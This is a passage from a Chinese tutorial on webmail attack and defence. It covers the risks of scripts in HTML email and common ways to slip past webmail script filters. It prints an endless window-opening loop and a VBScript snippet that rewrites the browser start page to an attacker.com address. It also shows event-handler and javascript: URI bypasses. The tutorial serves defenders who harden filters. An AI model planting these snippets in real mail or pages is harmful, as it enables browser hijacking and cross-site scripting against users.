Webmail攻防实战

核心提示： ＜script language="JavaScript"＞＜!--while (true){window.open("URI")； //如果URI就是当前页本身，那就更具破坏性，Webmail攻防实战(7)，}//--＞＜/script＞2、修改注

＜script language="JavaScript"＞
　　＜!--
while (true)
{
window.open("URI")； //如果URI就是当前页本身，那就更具破坏性。
}
//--＞
　　＜/script＞

2、修改注册表：

＜script language="VBScript"＞
Set RegWsh = CreateObject("WScript.Shell")
'设置IE浏览器默认页
RegWsh.RegWrite "HKCUSoftwareMicrosoftInternet ExplorerMainStart Page", "http://www.attacker.com"
＜/script＞

鉴于脚本程序可能带来的危险，WebMail系统完全有必要禁止html邮件中的脚本程序。禁止脚本程序的基本做法就是过滤掉html源程序中能够使脚本程序运行的代码，如script元素等，在这方面做的最好的莫过于hotmail了。下面是些常见的绕过脚本程序过滤的方法，不少的WebMail系统仍然没有完全改正：

(1) 在html语言里，除了script元素内的或在script元素内引入的脚本程序能在html页面装载时被运行外，使用事件属性也能调用脚本程序运行，事件属性在JavaScript语言里被称为事件句柄，用于对页面上的某个特定事件（如鼠标点击、表单提交）做出响应，驱动javascript程序运行。它的语法如下：

＜tag attribute1 attribute2 onEventName="javascript code；"＞

例如：

＜body onload="alert('JavaScript#1 is executed')；"＞
＜a href="http://cms.ddvip.com/index.php#" onclick="alert('JavaScript#2 is executed')；"＞Click here＜/a＞
＜form method="post" action="#" onsubmit="alert('JavaScript#3 is executed')；"＞
＜input type="submit" value="Submit"＞
＜/form＞
＜/body＞

(2) URI（Universal Resource Identifier：通用资源标识）用于定位Internet上每种可用的资源，如HTML文档、图像、声音等。浏览器根据URI的资源类型（URI scheme）调用相应的程序操作该资源，如果把一些元素的URI属性值的资源类型设为javascript，则能够调用javascript程序运行。语法如下，注意要用“；”分隔不同的javascript语句：